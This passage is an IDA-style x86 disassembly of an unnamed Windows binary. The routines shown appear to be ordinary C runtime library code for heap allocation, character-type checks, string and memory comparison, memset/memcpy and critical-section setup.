imul esi, [ebp+arg_4]
mov [ebp+var_1C], esi
test esi, esi
jnz short loc_41E5C9
inc esi
loc_41E5C9: ; CODE XREF: sub_41E5AE+18�j
; sub_41E5AE+9F�j
xor edi, edi
mov [ebp+var_20], edi
cmp esi, 0FFFFFFE0h
ja short loc_41E638
cmp dword_482964, 3
jnz short loc_41E623
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_1C]
cmp ebx, dword_482950
ja short loc_41E623
push 4
call sub_41A166
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_41A9BE
pop ecx
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E658
mov edi, [ebp+var_20]
test edi, edi
jz short loc_41E627
push [ebp+var_1C]
push 0
push edi
call sub_41E880
add esp, 0Ch
loc_41E623: ; CODE XREF: sub_41E5AE+2C�j
; sub_41E5AE+40�j
test edi, edi
jnz short loc_41E661
loc_41E627: ; CODE XREF: sub_41E5AE+65�j
push esi
push 8
push dword_482960
call dword_42205C ; RtlAllocateHeap
mov edi, eax
loc_41E638: ; CODE XREF: sub_41E5AE+23�j
test edi, edi
jnz short loc_41E661
cmp dword_481314, edi
jz short loc_41E661
push esi
call sub_41AD08
pop ecx
test eax, eax
jnz loc_41E5C9
jmp short loc_41E663
sub_41E5AE endp
; =============== S U B R O U T I N E =======================================
sub_41E655 proc near ; DATA XREF: .text:stru_42C9E0�o
mov esi, [ebp+0Ch]
sub_41E655 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E658 proc near ; CODE XREF: sub_41E5AE+5B�p
push 4
call sub_41A0D2
pop ecx
retn
sub_41E658 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E5AE
loc_41E661: ; CODE XREF: sub_41E5AE+77�j
; sub_41E5AE+8C�j ...
mov eax, edi
loc_41E663: ; CODE XREF: sub_41E5AE+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E5AE
; =============== S U B R O U T I N E =======================================
sub_41E669 proc near ; CODE XREF: sub_419255+CF�p
; sub_419255+301�p ...
arg_0 = dword ptr 4
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_41E67E
call sub_419F8E
loc_41E67E: ; CODE XREF: sub_41E669+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41E694
push 4
push [esp+4+arg_0]
push eax
call sub_419D8B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41E694: ; CODE XREF: sub_41E669+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41E669 endp
; =============== S U B R O U T I N E =======================================
sub_41E6A3 proc near ; CODE XREF: sub_419255+840�p
; sub_419255+922�p
arg_0 = dword ptr 4
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_41E6B8
call sub_419F8E
loc_41E6B8: ; CODE XREF: sub_41E6A3+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41E6D1
push 80h
push [esp+4+arg_0]
push eax
call sub_419D8B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41E6D1: ; CODE XREF: sub_41E6A3+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41E6A3 endp
; =============== S U B R O U T I N E =======================================
sub_41E6E2 proc near ; CODE XREF: sub_419255+3F�p
; sub_419255+5A�p ...
arg_0 = dword ptr 4
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_41E6F7
call sub_419F8E
loc_41E6F7: ; CODE XREF: sub_41E6E2+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41E70D
push 8
push [esp+4+arg_0]
push eax
call sub_419D8B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41E70D: ; CODE XREF: sub_41E6E2+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41E6E2 endp
; =============== S U B R O U T I N E =======================================
sub_41E71C proc near ; CODE XREF: sub_419255+6D�p
; sub_419255+3DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41E768
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41E73A
test al, al
jns short loc_41E768
test al, 2
jnz short loc_41E768
loc_41E73A: ; CODE XREF: sub_41E71C+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41E747
push esi
call sub_41E4B9
pop ecx
loc_41E747: ; CODE XREF: sub_41E71C+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41E757
cmp dword ptr [esi+4], 0
jnz short loc_41E768
inc eax
mov [esi], eax
loc_41E757: ; CODE XREF: sub_41E71C+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_41E76E
cmp [eax], bl
jz short loc_41E770
inc eax
mov [esi], eax
loc_41E768: ; CODE XREF: sub_41E71C+9�j
; sub_41E71C+18�j ...
or eax, 0FFFFFFFFh
loc_41E76B: ; CODE XREF: sub_41E71C+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41E76E: ; CODE XREF: sub_41E71C+43�j
mov [eax], bl
loc_41E770: ; CODE XREF: sub_41E71C+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41E76B
sub_41E71C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E788 proc near ; CODE XREF: sub_41E848+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_41E7AC
cmp [ebp+arg_C], ebx
jz short loc_41E7AC
mov al, [edi]
cmp al, bl
jnz short loc_41E7B3
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_41E7AC
mov [eax], bx
loc_41E7AC: ; CODE XREF: sub_41E788+D�j
; sub_41E788+12�j ...
xor eax, eax
loc_41E7AE: ; CODE XREF: sub_41E788+44�j
; sub_41E788+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41E7B3: ; CODE XREF: sub_41E788+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_41E7CE
mov ecx, [ebp+arg_4]
cmp ecx, ebx
jz short loc_41E7C9
movzx ax, al
mov [ecx], ax
loc_41E7C9: ; CODE XREF: sub_41E788+38�j
; sub_41E788+AB�j
xor eax, eax
inc eax
jmp short loc_41E7AE
; ---------------------------------------------------------------------------
loc_41E7CE: ; CODE XREF: sub_41E788+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E817
mov eax, [esi+28h]
cmp eax, 1
jle short loc_41E805
cmp [ebp+arg_C], eax
jl short loc_41E805
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41E812
loc_41E805: ; CODE XREF: sub_41E788+59�j
; sub_41E788+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_41E835
cmp [edi+1], bl
jz short loc_41E835
loc_41E812: ; CODE XREF: sub_41E788+7B�j
mov eax, [esi+28h]
jmp short loc_41E7AE
; ---------------------------------------------------------------------------
loc_41E817: ; CODE XREF: sub_41E788+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41E7C9
loc_41E835: ; CODE XREF: sub_41E788+83�j
; sub_41E788+88�j
call sub_41B935
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41E7AE
sub_41E788 endp
; =============== S U B R O U T I N E =======================================
sub_41E848 proc near ; CODE XREF: sub_419255+68F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_41E85D
call sub_419F8E
loc_41E85D: ; CODE XREF: sub_41E848+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_41E788
add esp, 10h
retn
sub_41E848 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41E880 proc near ; CODE XREF: sub_419255+512�p
; sub_41BCFA+8C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41E8DB
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41E8CB
neg ecx
and ecx, 3
jz short loc_41E8AD
sub edx, ecx
loc_41E8A3: ; CODE XREF: sub_41E880+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41E8A3
loc_41E8AD: ; CODE XREF: sub_41E880+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41E8CB
rep stosd
test edx, edx
jz short loc_41E8D5
loc_41E8CB: ; CODE XREF: sub_41E880+18�j
; sub_41E880+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41E8CB
loc_41E8D5: ; CODE XREF: sub_41E880+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E8DB: ; CODE XREF: sub_41E880+A�j
mov eax, [esp+arg_0]
retn
sub_41E880 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E8E0 proc near ; CODE XREF: sub_419D8B+60�p
; sub_41CF64+A4�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_42C9F0
call __SEH_prolog
xor esi, esi
cmp dword_48143C, esi
jnz short loc_41E92B
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_42C150
push edi
call dword_422158 ; GetStringTypeW
test eax, eax
jz short loc_41E916
mov dword_48143C, edi
jmp short loc_41E92B
; ---------------------------------------------------------------------------
loc_41E916: ; CODE XREF: sub_41E8E0+2C�j
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41E92B
mov dword_48143C, 2
loc_41E92B: ; CODE XREF: sub_41E8E0+14�j
; sub_41E8E0+34�j ...
mov eax, dword_48143C
cmp eax, 2
jz loc_41EA23
cmp eax, esi
jz loc_41EA23
cmp eax, 1
jnz loc_41EA49
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_41E95D
mov eax, dword_481488
mov [ebp+arg_10], eax
loc_41E95D: ; CODE XREF: sub_41E8E0+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call dword_4220D4 ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_41EA49
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_41E880
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41E9CE
; ---------------------------------------------------------------------------
loc_41E9B9: ; DATA XREF: .text:stru_42C9F0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41E9BD: ; DATA XREF: .text:stru_42C9F0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41E9CE: ; CODE XREF: sub_41E8E0+D7�j
test esi, esi
jnz short loc_41E9E9
push edi
push 2
call sub_41E5AE
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_41EA49
mov [ebp+var_24], 1
loc_41E9E9: ; CODE XREF: sub_41E8E0+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jz short loc_41EA11
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_422158 ; GetStringTypeW
mov [ebp+var_20], eax
loc_41EA11: ; CODE XREF: sub_41E8E0+11E�j
cmp [ebp+var_24], 0
jz short loc_41EA1E
push esi
call sub_416C97
pop ecx
loc_41EA1E: ; CODE XREF: sub_41E8E0+135�j
mov eax, [ebp+var_20]
jmp short loc_41EA91
; ---------------------------------------------------------------------------
loc_41EA23: ; CODE XREF: sub_41E8E0+53�j
; sub_41E8E0+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41EA30
mov ebx, dword_481478
loc_41EA30: ; CODE XREF: sub_41E8E0+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_41EA3D
mov edi, dword_481488
loc_41EA3D: ; CODE XREF: sub_41E8E0+155�j
push ebx
call sub_42027F
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41EA4D
loc_41EA49: ; CODE XREF: sub_41E8E0+64�j
; sub_41E8E0+A5�j ...
xor eax, eax
jmp short loc_41EA91
; ---------------------------------------------------------------------------
loc_41EA4D: ; CODE XREF: sub_41E8E0+167�j
cmp eax, edi
jz short loc_41EA6F
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_4202C8
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_41EA49
mov [ebp+arg_4], esi
loc_41EA6F: ; CODE XREF: sub_41E8E0+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_4221D8 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_41EA8F
push esi
call sub_416C97
pop ecx
loc_41EA8F: ; CODE XREF: sub_41E8E0+1A6�j
mov eax, edi
loc_41EA91: ; CODE XREF: sub_41E8E0+141�j
; sub_41E8E0+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41E8E0 endp
; =============== S U B R O U T I N E =======================================
sub_41EA9A proc near ; CODE XREF: sub_419E02+B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41EC28
push dword ptr [esi+4]
call sub_416C97
push dword ptr [esi+8]
call sub_416C97
push dword ptr [esi+0Ch]
call sub_416C97
push dword ptr [esi+10h]
call sub_416C97
push dword ptr [esi+14h]
call sub_416C97
push dword ptr [esi+18h]
call sub_416C97
push dword ptr [esi]
call sub_416C97
push dword ptr [esi+20h]
call sub_416C97
push dword ptr [esi+24h]
call sub_416C97
push dword ptr [esi+28h]
call sub_416C97
push dword ptr [esi+2Ch]
call sub_416C97
push dword ptr [esi+30h]
call sub_416C97
push dword ptr [esi+34h]
call sub_416C97
push dword ptr [esi+1Ch]
call sub_416C97
push dword ptr [esi+38h]
call sub_416C97
push dword ptr [esi+3Ch]
call sub_416C97
add esp, 40h
push dword ptr [esi+40h]
call sub_416C97
push dword ptr [esi+44h]
call sub_416C97
push dword ptr [esi+48h]
call sub_416C97
push dword ptr [esi+4Ch]
call sub_416C97
push dword ptr [esi+50h]
call sub_416C97
push dword ptr [esi+54h]
call sub_416C97
push dword ptr [esi+58h]
call sub_416C97
push dword ptr [esi+5Ch]
call sub_416C97
push dword ptr [esi+60h]
call sub_416C97
push dword ptr [esi+64h]
call sub_416C97
push dword ptr [esi+68h]
call sub_416C97
push dword ptr [esi+6Ch]
call sub_416C97
push dword ptr [esi+70h]
call sub_416C97
push dword ptr [esi+74h]
call sub_416C97
push dword ptr [esi+78h]
call sub_416C97
push dword ptr [esi+7Ch]
call sub_416C97
add esp, 40h
push dword ptr [esi+80h]
call sub_416C97
push dword ptr [esi+84h]
call sub_416C97
push dword ptr [esi+88h]
call sub_416C97
push dword ptr [esi+8Ch]
call sub_416C97
push dword ptr [esi+90h]
call sub_416C97
push dword ptr [esi+94h]
call sub_416C97
push dword ptr [esi+98h]
call sub_416C97
push dword ptr [esi+9Ch]
call sub_416C97
push dword ptr [esi+0A0h]
call sub_416C97
push dword ptr [esi+0A4h]
call sub_416C97
push dword ptr [esi+0A8h]
call sub_416C97
add esp, 2Ch
loc_41EC28: ; CODE XREF: sub_41EA9A+7�j
pop esi
retn
sub_41EA9A endp
; =============== S U B R O U T I N E =======================================
sub_41EC2A proc near ; CODE XREF: sub_419E02+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41EC87
mov eax, [esi]
mov ecx, off_432D94
cmp eax, [ecx]
jz short loc_41EC4E
cmp eax, off_432D64
jz short loc_41EC4E
push eax
call sub_416C97
pop ecx
loc_41EC4E: ; CODE XREF: sub_41EC2A+13�j
; sub_41EC2A+1B�j
mov eax, [esi+4]
mov ecx, off_432D94
cmp eax, [ecx+4]
jz short loc_41EC6B
cmp eax, off_432D68
jz short loc_41EC6B
push eax
call sub_416C97
pop ecx
loc_41EC6B: ; CODE XREF: sub_41EC2A+30�j
; sub_41EC2A+38�j
mov esi, [esi+8]
mov eax, off_432D94
cmp esi, [eax+8]
jz short loc_41EC87
cmp esi, off_432D6C
jz short loc_41EC87
push esi
call sub_416C97
pop ecx
loc_41EC87: ; CODE XREF: sub_41EC2A+7�j
; sub_41EC2A+4C�j ...
pop esi
retn
sub_41EC2A endp
; =============== S U B R O U T I N E =======================================
sub_41EC89 proc near ; CODE XREF: sub_419E02+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41ED60
mov eax, [esi+0Ch]
mov ecx, off_432D94
cmp eax, [ecx+0Ch]
jz short loc_41ECB3
cmp eax, off_432D70
jz short loc_41ECB3
push eax
call sub_416C97
pop ecx
loc_41ECB3: ; CODE XREF: sub_41EC89+19�j
; sub_41EC89+21�j
mov eax, [esi+10h]
mov ecx, off_432D94
cmp eax, [ecx+10h]
jz short loc_41ECD0
cmp eax, off_432D74
jz short loc_41ECD0
push eax
call sub_416C97
pop ecx
loc_41ECD0: ; CODE XREF: sub_41EC89+36�j
; sub_41EC89+3E�j
mov eax, [esi+14h]
mov ecx, off_432D94
cmp eax, [ecx+14h]
jz short loc_41ECED
cmp eax, off_432D78
jz short loc_41ECED
push eax
call sub_416C97
pop ecx
loc_41ECED: ; CODE XREF: sub_41EC89+53�j
; sub_41EC89+5B�j
mov eax, [esi+18h]
mov ecx, off_432D94
cmp eax, [ecx+18h]
jz short loc_41ED0A
cmp eax, off_432D7C
jz short loc_41ED0A
push eax
call sub_416C97
pop ecx
loc_41ED0A: ; CODE XREF: sub_41EC89+70�j
; sub_41EC89+78�j
mov eax, [esi+1Ch]
mov ecx, off_432D94
cmp eax, [ecx+1Ch]
jz short loc_41ED27
cmp eax, off_432D80
jz short loc_41ED27
push eax
call sub_416C97
pop ecx
loc_41ED27: ; CODE XREF: sub_41EC89+8D�j
; sub_41EC89+95�j
mov eax, [esi+20h]
mov ecx, off_432D94
cmp eax, [ecx+20h]
jz short loc_41ED44
cmp eax, off_432D84
jz short loc_41ED44
push eax
call sub_416C97
pop ecx
loc_41ED44: ; CODE XREF: sub_41EC89+AA�j
; sub_41EC89+B2�j
mov esi, [esi+24h]
mov eax, off_432D94
cmp esi, [eax+24h]
jz short loc_41ED60
cmp esi, off_432D88
jz short loc_41ED60
push esi
call sub_416C97
pop ecx
loc_41ED60: ; CODE XREF: sub_41EC89+7�j
; sub_41EC89+C6�j ...
pop esi
retn
sub_41EC89 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41ED84: ; CODE XREF: .text:0041ED91�j
mov al, [edx]
or al, al
jz short loc_41ED93
add edx, 1
bts [esp], eax
jmp short loc_41ED84
; ---------------------------------------------------------------------------
loc_41ED93: ; CODE XREF: .text:0041ED88�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_41ED9C: ; CODE XREF: .text:0041EDAC�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_41EDAE
add esi, 1
bt [esp], eax
jnb short loc_41ED9C
loc_41EDAE: ; CODE XREF: .text:0041EDA3�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EDC0 proc near ; CODE XREF: sub_41C5E6+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41EE0C
loc_41EDD0: ; CODE XREF: sub_41EDC0+3C�j
; sub_41EDC0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41EE04
or al, al
jz short loc_41EE00
cmp ah, [ecx+1]
jnz short loc_41EE04
or ah, ah
jz short loc_41EE00
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41EE04
or al, al
jz short loc_41EE00
cmp ah, [ecx+3]
jnz short loc_41EE04
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41EDD0
mov edi, edi
loc_41EE00: ; CODE XREF: sub_41EDC0+18�j
; sub_41EDC0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41EE04: ; CODE XREF: sub_41EDC0+14�j
; sub_41EDC0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41EE0C: ; CODE XREF: sub_41EDC0+E�j
test edx, 1
jz short loc_41EE2C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41EE04
add ecx, 1
or al, al
jz short loc_41EE00
test edx, 2
jz short loc_41EDD0
loc_41EE2C: ; CODE XREF: sub_41EDC0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41EE04
or al, al
jz short loc_41EE00
cmp ah, [ecx+1]
jnz short loc_41EE04
or ah, ah
jz short loc_41EE00
add ecx, 2
jmp short loc_41EDD0
sub_41EDC0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41EEA2
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41EEA3
test eax, 1
jz short loc_41EE83
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41EED0
add esi, 1
add edi, 1
sub eax, 1
jz short loc_41EEA0
loc_41EE83: ; CODE XREF: .text:0041EE70�j
; .text:0041EE9E�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41EED0
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41EED0
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41EE83
loc_41EEA0: ; CODE XREF: .text:0041EE81�j
; .text:0041EEDA�j
pop edi
pop esi
locret_41EEA2: ; CODE XREF: .text:0041EE56�j
retn
; ---------------------------------------------------------------------------
loc_41EEA3: ; CODE XREF: .text:0041EE69�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41EED8
repe cmpsd
jz short loc_41EED8
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41EECB
cmp ch, dh
jnz short loc_41EECB
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41EECB
cmp ch, dh
loc_41EECB: ; CODE XREF: .text:0041EEB9�j
; .text:0041EEBD�j ...
mov eax, 0
loc_41EED0: ; CODE XREF: .text:0041EE76�j
; .text:0041EE89�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41EED8: ; CODE XREF: .text:0041EEAB�j
; .text:0041EEAF�j
test eax, eax
jz short loc_41EEA0
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41EECB
sub eax, 1
jz short loc_41EF05
cmp dh, ch
jnz short loc_41EECB
sub eax, 1
jz short loc_41EF05
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41EECB
sub eax, 1
loc_41EF05: ; CODE XREF: .text:0041EEE7�j
; .text:0041EEF0�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41EF24: ; CODE XREF: .text:0041EF31�j
mov al, [edx]
or al, al
jz short loc_41EF33
add edx, 1
bts [esp], eax
jmp short loc_41EF24
; ---------------------------------------------------------------------------
loc_41EF33: ; CODE XREF: .text:0041EF28�j
mov esi, [ebp+8]
mov edi, edi
loc_41EF38: ; CODE XREF: .text:0041EF45�j
mov al, [esi]
or al, al
jz short loc_41EF4A
add esi, 1
bt [esp], eax
jnb short loc_41EF38
lea eax, [esi-1]
loc_41EF4A: ; CODE XREF: .text:0041EF3C�j
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41EF50: ; DATA XREF: sub_41EF60:loc_41EFA2�o
push dword ptr [esp+4]
call dword_422154 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF60 proc near ; CODE XREF: sub_41A034+26�p
; sub_41A0E7+49�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_42CB40
call __SEH_prolog
mov eax, dword_4814B4
test eax, eax
jnz short loc_41EFAC
cmp dword_481164, 1
jz short loc_41EFA2
push offset aKernel32_dll ; "kernel32.dll"
call dword_4220A4 ; GetModuleHandleA
test eax, eax
jz short loc_41EFA2
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call dword_422084 ; GetProcAddress
mov dword_4814B4, eax
test eax, eax
jnz short loc_41EFAC
loc_41EFA2: ; CODE XREF: sub_41EF60+1C�j
; sub_41EF60+2B�j
mov eax, offset loc_41EF50
mov dword_4814B4, eax
loc_41EFAC: ; CODE XREF: sub_41EF60+13�j
; sub_41EF60+40�j
and [ebp+ms_exc.disabled], 0
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; InitializeCriticalSectionAndSpinCount
mov [ebp+var_1C], eax
jmp short loc_41EFE1
; ---------------------------------------------------------------------------
loc_41EFBD: ; DATA XREF: .text:stru_42CB40�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41EFCB: ; DATA XREF: .text:stru_42CB40�o
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_20], 0C0000017h
jnz short loc_41EFDF
push 8
call dword_422174 ; RtlSetLastWin32Error
loc_41EFDF: ; CODE XREF: sub_41EF60+75�j
xor eax, eax
loc_41EFE1: ; CODE XREF: sub_41EF60+5B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_41EF60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFF0 proc near ; CODE XREF: sub_41A20A+2DE�p
; sub_41BBBB+13�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41F010
cmp edi, eax
jb loc_41F18C
loc_41F010: ; CODE XREF: sub_41EFF0+16�j
test edi, 3
jnz short loc_41F02C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F04C
rep movsd
jmp off_41F13C[edx*4]
; ---------------------------------------------------------------------------
loc_41F02C: ; CODE XREF: sub_41EFF0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41F044
and eax, 3
add ecx, eax
jmp dword ptr loc_41F04C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F044: ; CODE XREF: sub_41EFF0+46�j
jmp dword ptr loc_41F14C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41F04C: ; CODE XREF: sub_41EFF0+31�j
; sub_41EFF0+8E�j ...
